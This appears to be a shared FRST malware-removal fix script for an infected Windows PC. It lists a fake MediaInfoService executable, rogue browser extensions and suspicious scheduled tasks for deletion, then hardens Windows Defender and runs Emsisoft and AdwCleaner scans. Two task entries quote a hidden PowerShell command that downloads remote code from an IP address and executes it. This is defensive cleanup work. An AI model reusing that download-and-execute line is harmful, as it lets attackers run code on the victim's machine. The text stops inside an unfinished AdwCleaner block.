Malware Log Analysis

shared / Manic5467

Start::
CreateRestorePoint:
CloseProcesses:
2026-04-26 13:33 - 2026-04-26 13:33 - 000078848 ____N () [File not signed] C:\Users\marle\mm.exe\Plugins.Opera.dll
2026-04-26 13:33 - 2026-04-26 13:33 - 002800128 _____ () [File not signed] C:\Users\marle\mm.exe\SDL3.dll
2026-04-26 13:33 - 2026-04-26 13:33 - 000065536 _____ (Lamantine Software a.s.) [File not signed] C:\Users\marle\mm.exe\cvFormat.dll
2026-04-26 13:33 - 2026-04-26 13:33 - 000139352 _____ (Tenorshare (Hongkong) Limited -> ) [File not signed] C:\Users\marle\mm.exe\avdevice-59.dll
(svchost.exe ->) (Tenorshare (Hongkong) Limited -> Tenorshare) C:\Users\marle\mm.exe\MediaInfoService.exe
HKU\S-1-5-21-2270404040-1862323974-1284162387-1001\...\Run: [Media Info Service] => C:\Users\marle\mm.exe\MediaInfoService.exe [2083928 2026-04-26] (Tenorshare (Hongkong) Limited -> Tenorshare) <==== ATTENTION
Task: {BCEA2C7C-DA5A-482B-AB6B-6C5A24279109} - System32\Tasks\Media Info Service => C:\Users\marle\mm.exe\MediaInfoService.exe [2083928 2026-04-26] (Tenorshare (Hongkong) Limited -> Tenorshare) <==== ATTENTION
CHR Extension: (Volume Booster) - C:\Users\marle\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\anmbbeeiaollmpadookgoakpfjkbidaf [2024-02-10]
CHR Extension: (Adblock for YouTube™) - C:\Users\marle\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jpefmbpcbebpjpmelobfakahfdcgcmkl [2025-10-15]
2026-04-26 13:34 - 2026-04-26 13:34 - 000000000 ____D C:\Users\marle\AppData\Local\Yandex
2026-04-26 13:33 - 2026-04-26 13:33 - 000000000 ____D C:\Users\marle\mm.exe
Edge Extension: (Google Docs) - C:\Users\marle\AppData\Local\elram\llg [2026-04-26] [UpdateUrl:0] <==== ATTENTION
CHR Extension: (Google Docs) - C:\Users\marle\AppData\Local\elram\llg [2026-04-26] [UpdateUrl:0] <==== ATTENTION
2026-04-26 13:32 - 2026-04-26 13:32 - 000000000 ____D C:\Users\marle\AppData\Roaming\RenPy
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\bobbrlio.sys:changelist [296]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\qdcnsumf.sys:changelist [296]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk:A1B76439FE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk:B96E9B8455 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\JBL QuantumENGINE.lnk:DB4CD983BC [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk:60EC9648C0 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenShot Video Editor.lnk:1873A810D8 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook (classic).lnk:5465085A2F [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook (classic).lnk:BE800952D3 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk:1DC1525F34 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk:104946E0EA [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sticky Notes (new).lnk:3DF0A9C0EF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk:7AD7FA8AB1 [4298]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [7804]
FirewallRules: [UDP Query User{565ADCF0-B64C-4A66-8FC7-9150BC48BD7C}C:\program files (x86)\steam\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [TCP Query User{48327B13-B811-423C-AE95-354007579A77}C:\program files (x86)\steam\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [UDP Query User{C3378123-B145-48F1-8B61-E85F607AA213}C:\program files (x86)\steam\steamapps\common\fragpunkplaytest\fragpunk\binaries\win64\fragpunk.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\fragpunkplaytest\fragpunk\binaries\win64\fragpunk.exe => No File
FirewallRules: [TCP Query User{A1A67F49-5E02-43E7-8D76-05191BC19181}C:\program files (x86)\steam\steamapps\common\fragpunkplaytest\fragpunk\binaries\win64\fragpunk.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\fragpunkplaytest\fragpunk\binaries\win64\fragpunk.exe => No File
FirewallRules: [UDP Query User{06507BA9-ACCF-4385-9B71-D20D70FDC24A}C:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) C:\riot games\riot client\riotclientelectron\riot client.exe => No File
FirewallRules: [TCP Query User{8EB4F17F-E9BC-44EE-BE91-D16A1B3F96F1}C:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) C:\riot games\riot client\riotclientelectron\riot client.exe => No File
FirewallRules: [{EE6E72EA-AD50-4F32-AE25-24623599F2D6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe => No File
FirewallRules: [{E7297D14-BDDD-445A-A525-9E1994D33BD4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Team Fortress 2\hl2.exe => No File
FirewallRules: [{30F2A71F-38C7-4C38-88AE-C84897411CD1}] => (Allow) C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_4fc38a913e0f2ea5\ASUSLinkRemote\AsusLinkRemoteAgent.exe => No File
FirewallRules: [{3510CA42-4C7F-4BD4-9BED-5A951A755FE9}] => (Allow) C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_4fc38a913e0f2ea5\ASUSLinkRemote\AsusLinkRemoteAgent.exe => No File
FirewallRules: [UDP Query User{903FDB9D-44D3-4A3D-96E7-B028D47622BD}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe => No File
FirewallRules: [TCP Query User{C3F35618-4FD6-4761-9322-792464AF1FAD}C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\grand theft auto v\gta5.exe => No File
FirewallRules: [UDP Query User{761B43E2-9F78-4DA3-8B16-BEC0C36B5AF5}C:\program files (x86)\steam\steamapps\common\tmodloader\dotnet\6.0.14\dotnet.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\tmodloader\dotnet\6.0.14\dotnet.exe => No File
FirewallRules: [TCP Query User{DA33AC07-7229-405A-A775-D16FCCDCAD27}C:\program files (x86)\steam\steamapps\common\tmodloader\dotnet\6.0.14\dotnet.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\tmodloader\dotnet\6.0.14\dotnet.exe => No File
FirewallRules: [{10600936-1C3B-442A-A2AE-6D727CE0526B}] => (Allow) D:\SteamLibrary\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [{4D44EFE5-2E32-40EF-9837-F622D5D599EB}] => (Allow) D:\SteamLibrary\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [UDP Query User{163720D2-ECA6-4CC5-8A0E-594B6D6D9D44}D:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) D:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [TCP Query User{88365EF1-DB6E-4F4B-BF72-B1064E15C66E}D:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) D:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [UDP Query User{4D8B605F-A147-49A5-87F7-90241A9854FE}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe => No File
FirewallRules: [TCP Query User{D003E968-0EC9-43CC-B8FE-4A2CFD13E51C}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe => No File
FirewallRules: [UDP Query User{4C76035E-3DC0-4EE6-B134-F358BBF29FA6}C:\riot games\valorant\live\shootergame\binaries\win64\valorant-win64-shipping.exe] => (Allow) C:\riot games\valorant\live\shootergame\binaries\win64\valorant-win64-shipping.exe => No File
FirewallRules: [TCP Query User{0FF39529-6A0F-491A-B305-22F3591DB606}C:\riot games\valorant\live\shootergame\binaries\win64\valorant-win64-shipping.exe] => (Allow) C:\riot games\valorant\live\shootergame\binaries\win64\valorant-win64-shipping.exe => No File
FirewallRules: [UDP Query User{979E7CB8-1A79-4046-9EC8-1AE3B2DA3FAE}C:\xboxgames\hello neighbor 2\content\helloneighbor2\binaries\wingdk\helloneighbor2-wingdk-shipping.exe] => (Allow) C:\xboxgames\hello neighbor 2\content\helloneighbor2\binaries\wingdk\helloneighbor2-wingdk-shipping.exe => No File
FirewallRules: [TCP Query User{AB98616C-8362-420E-8938-C2C5893E00F8}C:\xboxgames\hello neighbor 2\content\helloneighbor2\binaries\wingdk\helloneighbor2-wingdk-shipping.exe] => (Allow) C:\xboxgames\hello neighbor 2\content\helloneighbor2\binaries\wingdk\helloneighbor2-wingdk-shipping.exe => No File
FirewallRules: [UDP Query User{CC7A587D-33ED-4B29-A219-B79D3C44291F}C:\program files (x86)\ubisoft\ubisoft game launcher\games\tom clancy's rainbow six siege\rainbowsix_vulkan.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\tom clancy's rainbow six siege\rainbowsix_vulkan.exe => No File
FirewallRules: [TCP Query User{523FE553-9660-4157-A839-0EC53D00D382}C:\program files (x86)\ubisoft\ubisoft game launcher\games\tom clancy's rainbow six siege\rainbowsix_vulkan.exe] => (Allow) C:\program files (x86)\ubisoft\ubisoft game launcher\games\tom clancy's rainbow six siege\rainbowsix_vulkan.exe => No File
FirewallRules: [UDP Query User{5251D614-B40C-4942-A6F4-53DD29FA28C8}C:\program files (x86)\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [TCP Query User{221C7D38-7288-443A-BA7D-B70407385B2F}C:\program files (x86)\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [{3809C49E-FFD5-412B-9F80-6C841810EBAD}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{E5FE0E30-C83F-4229-A632-2DCEFADC7333}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{D914A038-BC0C-4217-B4CD-8AF9511D82B6}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{3C01BCB7-A5B4-4F10-9088-9AAF5854EF20}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [UDP Query User{56A2BAF4-A91C-43E3-B562-FCEAEA59F8B7}D:\steamlibrary\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) D:\steamlibrary\steamapps\common\red dead redemption 2\rdr2.exe => No File
FirewallRules: [TCP Query User{A56DD956-B177-4AE4-BD41-828DAA98F130}D:\steamlibrary\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) D:\steamlibrary\steamapps\common\red dead redemption 2\rdr2.exe => No File
FirewallRules: [UDP Query User{10130969-AC8F-48BD-BA75-DFDAA20E79BD}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe => No File
FirewallRules: [TCP Query User{43E662DB-66ED-49EA-9A61-101EBF1AC1D9}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe => No File
FirewallRules: [{C35195E6-B243-460D-BD07-B293DE6B5B62}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\FarCry5\bin\ArcadeEditor64.exe => No File
FirewallRules: [{11480C47-C9F5-48FD-846D-FA4B58E33C28}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\FarCry5\bin\ArcadeEditor64.exe => No File
FirewallRules: [{26B8DB4D-F42A-48B0-83F1-0BA9E6BE3FC4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [{97916C85-1217-4F84-BD31-4ACB98CD775C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [{8C9F7AFF-43D1-4CAE-B4E0-CE1AA1D6E500}] => (Allow) C:\Program Files\Oculus\Support\oculus-client\OculusClient.exe => No File
FirewallRules: [{220EDF46-5088-41D1-9D66-A8E4B687AF62}] => (Allow) C:\Program Files\Oculus\Support\oculus-client\OculusClient.exe => No File
FirewallRules: [{F5149303-83C9-4FFC-B74C-E804354962A6}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Engine\Binaries\Win64\UnrealCEFSubProcess.exe => No File
FirewallRules: [{CAD5FE53-47B4-4DD4-84C6-40AE9B57DA5A}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Engine\Binaries\Win64\UnrealCEFSubProcess.exe => No File
FirewallRules: [{CA25EA67-66E4-4608-BAA2-74E15C56E96E}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2\Binaries\Win64\Home2-Win64-Shipping.exe => No File
FirewallRules: [{376AD331-F87D-4020-8766-9F64262F2D5E}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2\Binaries\Win64\Home2-Win64-Shipping.exe => No File
FirewallRules: [{79B62F47-1FE5-442B-8ADC-1E8CF1262592}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2.exe => No File
FirewallRules: [{26475443-ECB6-43D5-A31D-9CB1F2BB25DE}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2.exe => No File
FirewallRules: [{9339A019-5594-44E6-8B66-E72BB96C02C7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe => No File
FirewallRules: [{C2B09B6E-58C3-415C-87F8-4AB1FAFC8A31}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe => No File
FirewallRules: [{1EEC6050-9E16-43BC-A080-979AFA7D86B8}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe => No File
FirewallRules: [{11BA6441-16C4-4200-BD70-6D63FA1F8B37}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{17662A87-853E-433D-9287-00CA4E2614C0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [TCP Query User{886ADE20-B4AC-4CE8-A5B3-FE406EAFE5D8}D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [UDP Query User{FE8F0DF3-5AFA-4486-BB26-F055D4F1E180}D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [TCP Query User{0BC6F835-5EBE-4D66-B0A1-0913FC0EE0FB}C:\program files (x86)\steam\steamapps\common\star wars battlefront ii\starwarsbattlefrontii.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\star wars battlefront ii\starwarsbattlefrontii.exe => No File
FirewallRules: [UDP Query User{85FFBE14-5120-4C2A-A9E2-2DF79D7E32E3}C:\program files (x86)\steam\steamapps\common\star wars battlefront ii\starwarsbattlefrontii.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\star wars battlefront ii\starwarsbattlefrontii.exe => No File
FirewallRules: [TCP Query User{D55AB2A5-8857-4F5B-8E20-2B967D6C27DC}C:\program files (x86)\steam\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\red dead redemption 2\rdr2.exe => No File
FirewallRules: [UDP Query User{D3CA00B4-5296-409A-8FD2-CC95F9E2568D}C:\program files (x86)\steam\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\red dead redemption 2\rdr2.exe => No File
FirewallRules: [TCP Query User{D8402684-B45A-4227-B90A-C577BBE67B2B}D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe] => (Allow) D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe => No File
FirewallRules: [UDP Query User{D8EB95B2-E2B7-4AD8-8320-FEB7C5042010}D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe] => (Allow) D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe => No File
FirewallRules: [{E47FB11B-1208-495F-B16E-74623C1E3298}] => (Allow) D:\SteamLibrary\steamapps\common\Ready Or Not\Engine\Binaries\Win64\CrashReporter.exe => No File
FirewallRules: [{F6802076-B2C9-4DFA-A020-06DF36895D09}] => (Allow) D:\SteamLibrary\steamapps\common\Ready Or Not\Engine\Binaries\Win64\CrashReporter.exe => No File
FirewallRules: [TCP Query User{C713F153-E581-4F05-A263-9B3CA67C97A4}D:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe] => (Allow) D:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe => No File
FirewallRules: [UDP Query User{C67D17DB-0ABD-4FED-95AD-E71D0E6A8972}D:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe] => (Allow) D:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe => No File
FirewallRules: [TCP Query User{C441FBCF-A401-4ECD-B607-CB5A3DE35FFC}D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe] => (Allow) D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe => No File
FirewallRules: [UDP Query User{9CB95DC4-9C31-4402-904D-27386467A6BD}D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe] => (Allow) D:\steamlibrary\steamapps\common\pvzgw2\gw2.main_win64_retail.exe => No File
FirewallRules: [{51D007BE-F3BD-4DDD-B709-F7A65578EA91}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Drunk Driving Simulator\DDS.exe => No File
FirewallRules: [{96B83676-8C61-4824-9F9B-3040AB9A26BB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Drunk Driving Simulator\DDS.exe => No File
FirewallRules: [{0EF69C8E-8BD0-459D-AA71-381269875788}] => (Allow) D:\SteamLibrary\steamapps\common\Warframe\Tools\Launcher.exe => No File
FirewallRules: [{61220834-B2B7-48E3-891A-12A78540DE0C}] => (Allow) D:\SteamLibrary\steamapps\common\Warframe\Tools\Launcher.exe => No File
FirewallRules: [TCP Query User{52858366-3E32-487B-BF40-6B50FCDB7B98}C:\program files (x86)\steam\steamapps\common\smalland\smalland\binaries\win64\smalland-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\smalland\smalland\binaries\win64\smalland-win64-shipping.exe => No File
FirewallRules: [UDP Query User{430E9E47-5BB8-4ED0-8F80-52D9E751D2A4}C:\program files (x86)\steam\steamapps\common\smalland\smalland\binaries\win64\smalland-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\smalland\smalland\binaries\win64\smalland-win64-shipping.exe => No File
FirewallRules: [TCP Query User{1BAD1E41-2008-4FAF-9E22-8123D5CA58DD}C:\program files (x86)\steam\steamapps\common\tom clancy's rainbow six siege\rainbowsix.exe] => (Block) C:\program files (x86)\steam\steamapps\common\tom clancy's rainbow six siege\rainbowsix.exe => No File
FirewallRules: [UDP Query User{BDB769BE-407E-47C6-9942-8290137519F6}C:\program files (x86)\steam\steamapps\common\tom clancy's rainbow six siege\rainbowsix.exe] => (Block) C:\program files (x86)\steam\steamapps\common\tom clancy's rainbow six siege\rainbowsix.exe => No File
FirewallRules: [{D6188688-80DD-4B06-B32E-BCDBF04BCCE9}] => (Allow) C:\Program Files (x86)\Overwolf\0.296.2.1\OverwolfBrowser.exe => No File
FirewallRules: [{7BA21463-1D91-4466-8627-97D9BB0E4C7D}] => (Allow) C:\Program Files (x86)\Overwolf\0.296.2.1\OverwolfBrowser.exe => No File
FirewallRules: [{CFA1BB4D-69BE-418B-BFDE-7AD30F2D2E1C}] => (Block) C:\Program Files (x86)\Overwolf\0.296.2.1\OverwolfBrowser.exe => No File
FirewallRules: [{D325B120-3E98-4F5F-94CC-23B268594F66}] => (Block) C:\Program Files (x86)\Overwolf\0.296.2.1\OverwolfBrowser.exe => No File
HKU\S-1-5-21-2270404040-1862323974-1284162387-1001\...\RunOnce: [Delete Cached Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\marle\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" (No File)
Task: {348186DC-FB68-4B43-AA5D-DCF1F65E73A0} - System32\Tasks\ASUS\P508PowerAgent_sdk => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (No File)
Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
S3 cpuz158; \??\C:\WINDOWS\temp\cpuz158\cpuz158_x64.sys (No File) <==== ATTENTION
S3 cpuz159; \??\C:\WINDOWS\temp\cpuz159\cpuz159_x64.sys (No File) <==== ATTENTION
S3 cpuz160; \??\C:\WINDOWS\temp\cpuz160\cpuz160_x64.sys (No File) <==== ATTENTION
S3 EAAntiCheat; system32\drivers\eaanticheat.sys (No File)
2025-03-03 22:25 - 2025-03-03 22:25 - 000000024 _____ () C:\Users\marle\AppData\Roaming\C23W6Vk43XTwu662.dat
2025-11-27 20:21 - 2025-11-27 20:21 - 000000048 ____R () C:\Users\marle\AppData\Local\0119AC2FC90D95AC063B177717B7B3B6
2024-12-06 13:34 - 2024-12-06 13:34 - 000000048 ____R () C:\Users\marle\AppData\Local\B7E86F3D63FF6AC3FC92E35B2B2180B9
HKU\S-1-5-21-2270404040-1862323974-1284162387-1001\...\RunOnce: [Uninstall 26.062.0402.0002_1] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\marle\AppData\Local\Microsoft\OneDrive\26.062.0402.0002_1" [0 2026-05-05] () <==== ATTENTION [zero byte File/Folder]
Task: {5E751CBB-B664-4D96-A147-71C33C4D4BFF} - System32\Tasks\Google Compatibility Appraiser CL_NCL_581fdfb9e67e5b54 => C:\Windows\system32\conhost.exe [1003520 2026-04-15] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
Task: {FF37DBA5-A263-4396-813E-52A2FA1D8816} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem47.0.7703.CL_NCL_581fdfb9e67e5b54{47263A17-2D66-43B9-9692-56314D0C1AEC} => C:\Windows\system32\conhost.exe [1003520 2026-04-15] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
C:\Users\marle\AppData\Local\elram
2026-04-26 13:30 - 2026-04-26 13:30 - 760231840 _____ C:\Users\marle\Downloads\Archive.zip
2026-04-26 13:33 - 2026-04-26 13:33 - 000004376 _____ C:\WINDOWS\system32\Tasks\Google Compatibility Appraiser CL_NCL_581fdfb9e67e5b54
2023-02-23 21:07 - 2023-02-23 21:07 - 000006598 _____ () C:\Users\marle\AppData\Local\92761170034
2023-03-05 18:33 - 2023-03-05 18:33 - 000006598 _____ () C:\Users\marle\AppData\Local\93803181808
StartPowerShell:
# Enable real-time protection
Set-MpPreference -DisableRealtimeMonitoring $false
# Enable behavioural protection
Set-MpPreference -DisableBehaviorMonitoring $false
# Enable PUP detection
Set-MpPreference -PUAProtection Enabled
# Enable cloud protection at level 4 (HighPlus): aggressively block unknowns and apply additional protection measures; alternatively use 2 for lower protection or 0 for the default
Set-MpPreference -CloudBlockLevel 4
# Send advanced information about malicious/unwanted software present on your device
Set-MpPreference -MAPSReporting 2
# Send safe samples automatically to Microsoft
Set-MpPreference -SubmitSamplesConsent 1
# Enables inspection of HTTP traffic to detect malicious websites
Set-MpPreference -EnableNetworkProtection Enabled
# Enables block at first seen
Set-MpPreference -DisableBlockAtFirstSeen $false
# Allows scanning of archive files, such as .zip and .cab files, for malware/PUP
Set-MpPreference -DisableArchiveScanning $false
# Enables automatic scanning of USB & removable drives
Set-MpPreference -DisableRemovableDriveScanning $false
# Enables scanning of network files
Set-MpPreference -DisableScanningNetworkFiles $false
# Forces a signature check before running a scan
Set-MpPreference -CheckForSignaturesBeforeRunningScan $true
# Extends the cloud check timer from the default 10 to 30 seconds
Set-MpPreference -CloudExtendedTimeout 30
# Enables automatic scanning of all downloaded files and attachments
Set-MpPreference -DisableIOAVProtection $false
# Enables script detection
Set-MpPreference -DisableScriptScanning $false
# Disables automatic exclusions from scanning
Set-MpPreference -DisableAutoExclusions 1
# Enables scanning of mapped network drives
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 0
# Enables scanning of email files
Set-MpPreference -DisableEmailScanning 0
# Enables blocking of malicious domains and IPs at DNS level
Set-MpPreference -EnableDnsSinkhole $true
# Enables signature updates every 12 hours
Set-MpPreference -SignatureUpdateInterval 12
# Enables automatic quarantine for threats labelled as high and severe
Set-MpPreference -HighThreatDefaultAction Quarantine
Set-MpPreference -SevereThreatDefaultAction Quarantine
# Updates signatures
Update-MpSignature
EndPowerShell:
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from Emsisoft's official site, updates it and scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUPs in 1) system memory and 2) important folders, as the documentation says
# It will scan inside compressed archives, mail archives and NTFS alternate data streams, and use cloud requests
# ---
# You can use the argument "/delete" to delete found objects including references, but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan, but that may take longer than what FRST can handle.
# You can use the argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) { New-Item -Path $frstPath -ItemType Directory -Force | Out-Null }
if (-not (Test-Path $extractPath)) { New-Item -Path $extractPath -ItemType Directory -Force | Out-Null }
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
# Wait for the self-extractor to drop a2cmd.exe, but give up after 5 minutes rather than hang the fix if extraction fails
$deadline = (Get-Date).AddMinutes(5)
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe") -and (Get-Date) -lt $deadline) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) { $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe" } else { $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe" }
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
StartPowerShell:
# Downloads the newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log to the console
# Does not clean preinstalled objects, only PUP/Adware
